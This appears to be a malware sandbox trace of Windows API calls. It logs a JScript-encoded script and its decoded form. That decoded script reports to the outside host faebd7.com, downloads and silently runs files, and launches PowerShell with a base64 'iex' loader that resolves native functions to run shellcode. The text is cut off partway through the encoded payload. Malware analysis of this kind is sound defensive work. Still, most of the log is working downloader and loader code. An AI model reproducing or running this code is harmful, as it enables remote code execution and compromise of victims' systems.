pvarIndex=0x0, pvarValue=0x18c820*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0)) returned 0x0 [0082.956] IUnknown:Release (This=0x2eec40) returned 0x2 [0082.956] IUnknown:AddRef (This=0x2eec30) returned 0x3 [0082.956] IUnknown:AddRef (This=0x2eec38) returned 0x4 [0082.956] IUnknown:QueryInterface (in: This=0x2eec30, riid=0x7fef6ad47f0*(Data1=0x4954e0d0, Data2=0xfbc7, Data3=0x11d1, Data4=([0]=0x84, [1]=0x10, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x18c610 | out: ppvObject=0x18c610*=0x2eec40) returned 0x0 [0082.956] IActiveScriptProperty:SetProperty (This=0x2eec40, dwProperty=0x70000001, pvarIndex=0x0, pvarValue=0x18c5e0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0)) returned 0x80004001 [0082.956] IUnknown:Release (This=0x2eec40) returned 0x4 [0082.956] IActiveScriptParse64:InitNew (This=0x2eec38) returned 0x0 [0082.956] IActiveScript:SetScriptSite (This=0x2eec30, pass=0x3f1d10) returned 0x0 [0082.956] GetCurrentThreadId () returned 0x678 [0082.956] IUnknown:QueryInterface (in: This=0x3f1d10, riid=0x7fef49a5d38*(Data1=0x539698a0, Data2=0xcdca, Data3=0x11cf, Data4=([0]=0xa5, [1]=0xeb, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x47, [6]=0xa0, [7]=0x63)), ppvObject=0x2ef408 | out: ppvObject=0x2ef408*=0x3f1d30) returned 0x0 [0082.956] IUnknown:AddRef (This=0x3f1d10) returned 0x3 [0082.956] IActiveScriptSite:GetLCID (in: This=0x3f1d10, plcid=0x18c618 | out: plcid=0x18c618*=0x409) returned 0x0 [0082.956] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0082.956] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x18c5a0, cchData=6 | out: lpLCData="1252") returned 5 [0082.956] IsValidCodePage (CodePage=0x4e4) returned 1 [0082.956] IActiveScriptSite:OnScriptTerminate (This=0x3f1d10, pvarResult=0x5, pexcepinfo=0x20) returned 0x0 [0082.957] CoCreateInstance (in: rclsid=0x7fef49a5d88*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef49a5d98*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x2eefa0 | out: ppv=0x2eefa0*=0x3d8c40) returned 0x0 [0082.957] IUnknown:AddRef (This=0x3d8c40) returned 0x2 [0082.957] GetCurrentProcessId () returned 0x674 [0082.957] GetCurrentThreadId () returned 0x678 [0082.957] GetTickCount () returned 0x3f6f [0082.957] ISystemDebugEventFire:BeginSession (This=0x3d8c40, guidSourceID=0x7fef49a5da8, strSessionName="JScript:00001652:00001656:18016239") returned 0x0 [0082.957] IActiveScript:GetScriptState (in: This=0x2eec30, pssState=0x18c630 | out: pssState=0x18c630*=5) returned 0x0 [0082.957] IActiveScript:SetScriptState (This=0x2eec30, ss=1) returned 0x0 [0082.957] IActiveScriptSite:OnScriptTerminate (This=0x3f1d10, pvarResult=0x1, pexcepinfo=0x0) returned 0x0 [0082.957] IActiveScript:AddNamedItem (This=0x2eec30, pstrName="window", dwFlags=0xe) returned 0x0 [0082.957] GetCurrentThreadId () returned 0x678 [0082.957] IActiveScriptSite:GetItemInfo (in: This=0x3f1d10, pstrName="window", dwReturnMask=0x1, ppiunkItem=0x18c4e0, ppti=0x0 | out: ppiunkItem=0x18c4e0*=0x3c92c0, ppti=0x0) returned 0x0 [0082.957] IUnknown:QueryInterface (in: This=0x3c92c0, riid=0x7fef49a6340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18c5d8 | out: ppvObject=0x18c5d8*=0x3c92c0) returned 0x0 [0082.957] IUnknown:Release (This=0x3c92c0) returned 0xb [0082.957] IUnknown:AddRef (This=0x3c92c0) returned 0xc [0082.957] IUnknown:QueryInterface (in: This=0x3c92c0, riid=0x7fef49a6370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x18c558 | out: ppvObject=0x18c558*=0x0) returned 0x80004002 [0082.957] IUnknown:QueryInterface (in: This=0x3c92c0, riid=0x7fef49a6518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x18c4d0 | out: ppvObject=0x18c4d0*=0x0) returned 0x80004002 [0082.957] IUnknown:QueryInterface (in: This=0x3c92c0, riid=0x7fef49a64f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18c4d8 | out: ppvObject=0x18c4d8*=0x3c92c0) returned 0x0 [0082.957] CoGetObjectContext (in: riid=0x7fef49a6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18c540 | out: ppv=0x18c540*=0x39ac80) returned 0x0 [0082.957] IUnknown:Release (This=0x39ac80) returned 0x1 [0082.957] IUnknown:QueryInterface (in: This=0x3c92c0, riid=0x7fef49a6370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x18c518 | out: ppvObject=0x18c518*=0x0) returned 0x80004002 [0082.957] IUnknown:QueryInterface (in: This=0x3c92c0, riid=0x7fef49a6518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x18c490 | out: ppvObject=0x18c490*=0x0) returned 0x80004002 [0082.957] IUnknown:QueryInterface (in: This=0x3c92c0, riid=0x7fef49a64f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18c498 | out: ppvObject=0x18c498*=0x3c92c0) returned 0x0 [0082.957] CoGetObjectContext (in: riid=0x7fef49a6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18c500 | out: ppv=0x18c500*=0x39ac80) returned 0x0 [0082.957] IUnknown:Release (This=0x39ac80) returned 0x1 [0082.957] IUnknown:QueryInterface (in: This=0x3c92c0, riid=0x7fef49a6370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x18c518 | out: ppvObject=0x18c518*=0x0) returned 0x80004002 [0082.957] IUnknown:QueryInterface (in: This=0x3c92c0, riid=0x7fef49a6518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x18c490 | out: ppvObject=0x18c490*=0x0) returned 0x80004002 [0082.957] IUnknown:QueryInterface (in: This=0x3c92c0, riid=0x7fef49a64f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18c498 | out: ppvObject=0x18c498*=0x3c92c0) returned 0x0 [0082.958] CoGetObjectContext (in: riid=0x7fef49a6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18c500 | out: ppv=0x18c500*=0x39ac80) returned 0x0 [0082.958] IUnknown:Release (This=0x39ac80) returned 0x1 [0082.958] IUnknown:Release (This=0x3c92c0) returned 0xe [0082.958] IUnknown:QueryInterface (in: This=0x2eec30, riid=0x7fef6ad47d0*(Data1=0xfe7c4271, Data2=0x210c, Data3=0x448d, Data4=([0]=0x9f, [1]=0x54, [2]=0x76, [3]=0xda, [4]=0xb7, [5]=0x4, [6]=0x7b, [7]=0x28)), ppvObject=0x3f1d90 | out: ppvObject=0x3f1d90*=0x2eec78) returned 0x0 [0082.958] IUnknown:QueryInterface (in: This=0x2eec30, riid=0x7fef6ad47f0*(Data1=0x4954e0d0, Data2=0xfbc7, Data3=0x11d1, Data4=([0]=0x84, [1]=0x10, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x18c770 | out: ppvObject=0x18c770*=0x2eec40) returned 0x0 [0082.958] IActiveScriptProperty:SetProperty (This=0x2eec40, dwProperty=0x70000002, pvarIndex=0x0, pvarValue=0x18c740*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0 [0082.958] IUnknown:Release (This=0x2eec40) returned 0x5 [0082.958] IUnknown:QueryInterface (in: This=0x2ed360, riid=0x7fef6ad47f0*(Data1=0x4954e0d0, Data2=0xfbc7, Data3=0x11d1, Data4=([0]=0x84, [1]=0x10, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x18c770 | out: ppvObject=0x18c770*=0x2ed370) returned 0x0 [0082.958] IActiveScriptProperty:SetProperty (This=0x2ed370, dwProperty=0x70000002, pvarIndex=0x0, pvarValue=0x18c740*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0 [0082.958] IUnknown:Release (This=0x2ed370) returned 0x4 [0082.958] IUnknown:Release (This=0x2eec30) returned 0x4 [0082.958] IUnknown:Release (This=0x2eec38) returned 0x3 [0082.958] IActiveScriptParse64:ParseScriptText (in: This=0x2eec38, pstrCode="#@~^kXcAAA==W!x^DkKxP^WTcV*\x09ODH\x09ax\x09+h,)mDk\\\x7fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\x09`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\x09Nc#p.\x7fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\x7fpr(Ln^D`J\x09j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\x09\\rDGUs+UYUODbxLdvJ]Ar\x09NrDuE*i2{h3J-'/HdhKh\x7fc'-Ar\x09NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\x09nSP)1Yb\\+or(%+1YcJUm.raYk\x09LRwkV\x7fjz/D+sr8Ln^DJbi6;x1YrG\x09Pm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\x09nY,0.Cs+hG.0Pd+D;a-w\x09Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\x7fY;DU~ZiN86;x1YrG\x09PNc;*\x09a'\x09nSP)1Yb\\+or(%+1YcJt/ah^ RUnD7+Do\\JC:KhR\x7fRTE*iaRK2+\x09`E!AKJS;B0CVkn*iac/\x7fxNv#p;0\x09'CRA62C\x09N2\x09-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\x7f6Yor^+cE6UD~OME\x7f~O8#pr0vEWY*\x09;WDR\x7fMrY\x7f`6c.n/aW\x09/nAG[H#IE6OR;VGd\x7f`#I;6'WR;.\x7flO\x7fK\x7f6Ywk^n`!0U~DD;n*iE6O'6RM\x7fOok^+vEWxObpEW/{;0DR62\x7fxbdP\x7f6O?D.\x7flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnV\x7fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\x7fsrV\x7f`;W\x09#i)Nh4kV\x7fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\x09\\r.Kx:\x7fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\x7f6Y 3\x09mGNbUTTl=bUZq&RVnYUY.k\x09oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\x7f!T|wOpI(Bt(\x7f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\x7fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\x7f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\x7f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\x09]2( qtm\x7f*;\"M.sC\x7flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\x7ft/\\\x7fHTm\x7f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\x7f8H*1&]V(?Xj\\\x7f}kt\x7fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\x7fVdtV.zpqHN}pgyoKW+j\x09#En?X2\\\x7ft2(:.An\x7flt4qs%Kq,0N\x096sF;9B40qV(\x7f1z\x7fjF-t_.d}U(k9!\\t(C1^|UX2\\\x7ftw(:#i\x7f(A^FZx1+`]s4V.\x095pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\x7fsk}q}/5\x7fXymjHdI(1.J2wFNV194Vs.mzqd\x0981Xm2]V(?XH9\x7f6TCq14m2]A}\x09XV\\ sZ}jTw}X]j\x7f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\x09w/::sD}Uaqm\x7f]V5xsPm\x7fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\x09tV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\x09jE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\x09Nst;q2rH]j\x7f($s5x.28VIsmbXA}\x09\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\x09sKm\x7f^d::.fiy6-N;aqlpx!9\x7fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\x7fqA(M.Otq*T5o]a4+lM(Ms\x09mHLk`x#E9MsO\\?6ge\x7flt}y#Vqb3Fmh.T[o9;q;]j\x7f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\x7ftq(:1ZC\x7fOEqV[4+8A4mhsO(;t8jVoXI\x7fqs9M.zFwA-mysZl\x09OEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\x7f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\x7f1EhK3d:\x7fs!tMw!42BXnUI`mU.sFj!L\x7f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\x7f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\x7f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\x7f*.e\x7f\\VKsoTlo}^K\x09.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\x7fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\x09\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\x09#E9MsO\\?*B8\x09Isms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\x091T(w1Xm2]V(?Xj9\x7f*TCqFsS0s!N!jX(&A:}oB m\x7fHV1XX(I\x7f*08Mj?}qeG|A*^NzFKesws52}oU\x7fXT`CIzFUhV.qX.5\x09\\V::sZlotV:\x7f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\x09#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\x09tV1x]N}L2!1:,D}:wy}:eTj2IHl\x09*UF;9\x09\x7foty\\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(\x7faG1\x7f9Deja?\x7f\x094t5qFq4\x09V##y.pI2$yq:1d\":,!C_sHHsonjhw|q\x7fs$?sqwj.[Dj![-9.w782\\h4V4a\x7f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\x7ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\x09AF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\x7fq*t?o9VCVt%4saZ\x7fMOeI!sHtA}\"Iq]k}3\\2Us9bj\x09skt3XZ\x7ff$pgsw_ix^l.yB(js9W+hH*\x090}+}ZHH\x7fjts:21pe`Isj2[\\}og(:M1`pZX\x7fq:[vd&s+\x7f\x7fwUikDw4wo\x094`In.\x09}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\x7f5!sT5FAx[2js?Vs3\x7fs}\x09pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\x7fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" mH\x09f4Apj$Jljj.H!w#\x09ws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\x09[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\x09_m-HwLZlP~5g2%S\x7fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 1Adys9UV9sCj\\&pUOoIsNwpisB[A6\x09?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\x7f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15\x7fxA~FygKNy(-js}:IuN2t..i}^B*\x7fVsT9FA$i_N21Gt~piwA5\x7fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\x09}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\x7fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\x7fV[njVLhI&2p:V}yCV& 4^o2l^tM?\x09V\x09\x09_N31yH5q:1e` I$n`qTNN45piwA\"fA~KjBA`xo2\x7fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\x09oCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\x7fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\x7fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\x7fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\x091U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\x09+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\x09NN4\x7f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\x7ftNpN$\x7fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\x7f", pstrItemName="window", punkContext=0x0, pstrDelimiter="", dwSourceContextCookie=0x0, ulStartingLineNumber=0x0, dwFlags=0x82, pvarResult=0x18ca80, pexcepinfo=0x18caa0 | out: pvarResult=0x18ca80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ec618, varVal2=0x368029df40000000), pexcepinfo=0x18caa0) returned 0x0 [0082.958] GetCurrentThreadId () returned 0x678 [0082.961] _wcsicmp (_String1="", _String2="") returned 0 [0082.962] SysStringLen (param_1="function log(l){try{x=new ActiveXObject(\"Msxml2.ServerXMLHTTP.6.0\");x.open(\"GET\",\"http://faebd7.com/log?log=\"+l,false);x.send();return 1;}catch(e){return 0;}}e=123;a=new ActiveXObject(\"WScript.Shell\");while(e!=42){try{w=a.ExpandEnvironmentStrings(\"%windir%\");p=w+\"\\\\syswow64\\\\windowspowershell\\\\v1.0\\\\powershell.exe\";f=new ActiveXObject(\"Scripting.FileSystemObject\");function cdn(){try{return a.RegRead(\"HKLM\\\\software\\\\microsoft\\\\net framework setup\\\\ndp\\\\v2.0.50727\\\\sp\");}catch(e){return 0;}}function d(u){x=new ActiveXObject(\"Msxml2.ServerXMLHTTP.6.0\");x.open(\"GET\",u,false);x.send();ufn=a.ExpandEnvironmentStrings(\"%temp%\\\\\")+u.substring(u.lastIndexOf(\"/\")+1);ufnt=ufn+\".tmp\";uft=f.CreateTextFile(ufnt,true,-1);if(uft){uft.Write(x.responseBody);uft.Close();uf=f.CreateTextFile(ufn,true);uft=f.GetFile(ufnt);ufs=uft.OpenAsTextStream();ufs.Read(2);uf.Write(ufs.Read(uft.Size-2));ufs.Close();uf.Close();f.DeleteFile(ufnt);a.Run(\"\\\"\"+ufn+\"\\\" /quiet /norestart\",0,1);f.DeleteFile(ufn);}}while(!f.FileExists(p)){if(cdn()==0){d(\"\");}d(\"\");}(a.Environment(\"Process\"))(\"a\")=\"iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('ZnVuY3Rpb24gZ2R7UGFyYW0gKFtQYXJhbWV0ZXIoUG9zaXRpb249MCxNYW5kYXRvcnk9JFRydWUpXSBbVHlwZVtdXSAkUGFyYW1ldGVycyxbUGFyYW1ldGVyKFBvc2l0aW9uPTEpXSBbVHlwZV0gJFJldHVyblR5cGU9W1ZvaWRdKTskVHlwZUJ1aWxkZXI9W0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1pY0Fzc2VtYmx5KChOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgiUmVmbGVjdGVkRGVsZWdhdGUiKSksW1N5c3RlbS5SZWZsZWN0aW9uLkVtaXQuQXNzZW1ibHlCdWlsZGVyQWNjZXNzXTo6UnVuKS5EZWZpbmVEeW5hbWljTW9kdWxlKCJJbk1lbW9yeU1vZHVsZSIsJGZhbHNlKS5EZWZpbmVUeXBlKCJNeURlbGVnYXRlVHlwZSIsIkNsYXNzLFB1YmxpYyxTZWFsZWQsQW5zaUNsYXNzLEF1dG9DbGFzcyIsW1N5c3RlbS5NdWx0aWNhc3REZWxlZ2F0ZV0pOyRUeXBlQnVpbGRlci5EZWZpbmVDb25zdHJ1Y3RvcigiUlRTcGVjaWFsTmFtZSxIaWRlQnlTaWcsUHVibGljIixbU3lzdGVtLlJlZmxlY3Rpb24uQ2FsbGluZ0NvbnZlbnRpb25zXTo6U3RhbmRhcmQsJFBhcmFtZXRlcnMpLlNldEltcGxlbWVudGF0aW9uRmxhZ3MoIlJ1bnRpbWUsTWFuYWdlZCIpOyRUeXBlQnVpbGRlci5EZWZpbmVNZXRob2QoIkludm9rZSIsIlB1YmxpYyxIaWRlQnlTaWcsTmV3U2xvdCxWaXJ0dWFsIiwkUmV0dXJuVHlwZSwkUGFyYW1ldGVycykuU2V0SW1wbGVtZW50YXRpb25GbGFncygiUnVudGltZSxNYW5hZ2VkIik7cmV0dXJuICRUeXBlQnVpbGRlci5DcmVhdGVUeXBlKCk7fWZ1bmN0aW9uIGdhe1BhcmFtIChbUGFyYW1ldGVyKFBvc2l0aW9uPTAsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJE1vZHVsZSxbUGFyYW1ldGVyKFBvc2l0aW9uPTEsTWFuZGF0b3J5PSRUcnVlKV0gW1N0cmluZ10gJFByb2NlZHVyZSk7JFN5c3RlbUFzc2VtYmx5PVtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKXxXaGVyZS1PYmplY3QgeyAkXy5HbG9iYWxBc3NlbWJseUNhY2hlIC1BbmQgJF8uTG9jYXRpb24uU3BsaXQoIlxcIilbLTFdLkVxdWFscygiU3lzdGVtLmRsbCIpfTskVW5zYWZlTmF0aXZlTWV0aG9kcz0kU3lzdGVtQXNzZW1ibHkuR2V0VHlwZSgiTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMiKTtyZXR1cm4gJFVuc2FmZU5hdGl2ZU1ldGhvZHMuR2V0TWV0aG9kKCJHZXRQcm9jQWRkcmVzcyIpLkludm9rZSgkbnVsbCxAKFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuSGFuZGxlUmVmXShOZXctT2JqZWN0IFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWYoKE5ldy1PYmplY3QgSW50UHRyKSwkVW5zYWZlTmF0aXZlTWV0aG9kcy5HZXRNZXRob2QoIkdldE1vZHVsZUhhbmRsZSIpLkludm9rZSgkbnVsbCxAKCRNb2R1bGUpKSkpLCRQcm9jZWR1cmUpKTt9W0J5dGVbXV0gJHA9W0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCJWWXZzZyt4b2FtdFlhbVZtaVVXWVdHcHlab2xGbWxocWJtYUpSWnhZYW1WbWlVV2VXR3BzWm9sRm9GaHFNMmFKUmFKWWFqSm1pVVdrV0dvdVpvbEZwbGhxWkdhSlJhaFlhbXhtaVVXcVdHYUpSYXhtaVVXdVpLRXdBQUFBeDBYQVZtbHlkTWRGeEhWaGJFSEhSY2hzYkc5anhrWE1BSXRBREZPRHdBeFd4MFhRVEc5aFpNZEYxRXhwWW5MSFJkaGhjbmxCeGtYY0FNZEZzRWRsZEZESFJiUnliMk5CeDBXNFpHUnlaV2JIUmJ4emM4WkZ2Z0NMeUZlTENXYURlU3dZZFNXTGNUQ05WWmd6L3l2eWpSUitpbFFWbURKVWZaajJ3a0YxQmtlRC93eHk2b1AvREhRNU84aDF6b3RWQ0l0Q1BJdEVFSGlEWmZnQUE4S0xlQ0NMY0J5TFdDU0xRQmdEOGdQYUEvcUpkZWlKWGV5SlJlU0Z3QStFZ2dBQUFPc0xpMUVZNjhtTFhleUxkZWlMUmZpTERJY1B0d1JEaXpTR2cyWDhBQVBLaVUzMGpVWFFBL0lwUmZTTFJmeUxYZlFEMklwRUJkQTZSQjNRZFFuL1JmeURmZndOY3VXRGZmd05kUU9KZGVDSlRmU05UYkF6d0NsTjlJdE45SXBjQmJBRHlEcGNEYkIxQmtDRCtBOXk2NFA0RDNVRGlYWHcvMFg0aTBYNE8wWGtjb1dOUmNCUVV2OVY4SXQxQ0l1ZVFCRUFBSUhHQkJFQUFHcEFhQUF3QUFBRDN2OXpVR29BLzlDSlJmaUZ3QStFRmdFQUFJ